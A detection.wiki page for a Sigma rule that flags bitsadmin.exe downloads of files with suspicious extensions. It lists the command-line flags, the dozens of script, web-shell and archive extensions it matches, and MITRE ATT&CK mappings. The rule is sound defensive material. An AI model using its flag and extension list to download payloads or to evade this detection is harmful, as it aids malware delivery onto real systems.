detection.wiki

Detection rules › Sigma

File With Suspicious Extension Downloaded Via Bitsadmin

Severity
high
Author
Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Source
upstream

Detects usage of bitsadmin downloading a file with a suspicious extension

MITRE ATT&CK coverage

TacticTechniques
PersistenceT1197 BITS Jobs
Defense EvasionT1036.003 Masquerading: Rename Legitimate Utilities, T1197 BITS Jobs
Command & ControlT1105 Ingress Tool Transfer

Event coverage

ProviderEvent IDTitle
Sysmon1Process creation

Stages and Predicates

Stage 1: all of selection_img

or:
Image|endswith: '\bitsadmin.exe'
OriginalFileName: bitsadmin.exe

Stage 2: all of selection_flags

or:
CommandLine|contains: ' /addfile '
CommandLine|contains: ' /create '
CommandLine|contains: ' /transfer '

Stage 3: all of selection_extension

or:
CommandLine|contains: .7z
CommandLine|contains: .asax
CommandLine|contains: .ashx
CommandLine|contains: .asmx
CommandLine|contains: .asp
CommandLine|contains: .aspx
CommandLine|contains: .bat
CommandLine|contains: .cfm
CommandLine|contains: .cgi
CommandLine|contains: .chm
CommandLine|contains: .cmd
CommandLine|contains: .dll
CommandLine|contains: .gif
CommandLine|contains: .jpeg
CommandLine|contains: .jpg
CommandLine|contains: .jsp
CommandLine|contains: .jspx
CommandLine|contains: .log
CommandLine|contains: .png
CommandLine|contains: .ps1
CommandLine|contains: .psm1
CommandLine|contains: .rar
CommandLine|contains: .scf
CommandLine|contains: .sct
CommandLine|contains: .txt
CommandLine|contains: .vbe
CommandLine|contains: .vbs
CommandLine|contains: .war
CommandLine|contains: .wsf
CommandLine|contains: .wsh
CommandLine|contains: .xll
CommandLine|contains: .zip

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.

FieldKindValues
CommandLinematch
  • /addfile corpus 5 (sigma 5)
  • /create corpus 14 (sigma 14)
  • /transfer corpus 5 (sigma 5)
  • .7z corpus 2 (sigma 2)
  • .asax
  • .ashx
  • .asmx
  • .asp
  • .aspx
  • .bat corpus 8 (sigma 8)
  • .cfm
  • .cgi
  • .chm corpus 2 (sigma 2)
  • .cmd corpus 5 (sigma 5)
  • .dll corpus 15 (sigma 15)
  • .gif corpus 6 (sigma 6)
  • .jpeg corpus 6 (sigma 6)
  • .jpg corpus 7 (sigma 7)
  • .jsp
  • .jspx
  • .log corpus 2 (sigma 2)
  • .png corpus 7 (sigma 7)
  • .ps1 corpus 3 (sigma 3)
  • .psm1
  • .rar corpus 2 (sigma 2)
  • .scf
  • .sct
  • .txt corpus 7 (sigma 7)
  • .vbe corpus 4 (sigma 4)
  • .vbs corpus 5 (sigma 5)
  • .war
  • .wsf corpus 2 (sigma 2)
  • .wsh corpus 2 (sigma 2)
  • .xll
  • .zip corpus 4 (sigma 4)
Imageends_with
  • \bitsadmin.exe corpus 23 (sigma 23)
OriginalFileNameeq
  • bitsadmin.exe corpus 9 (sigma 9)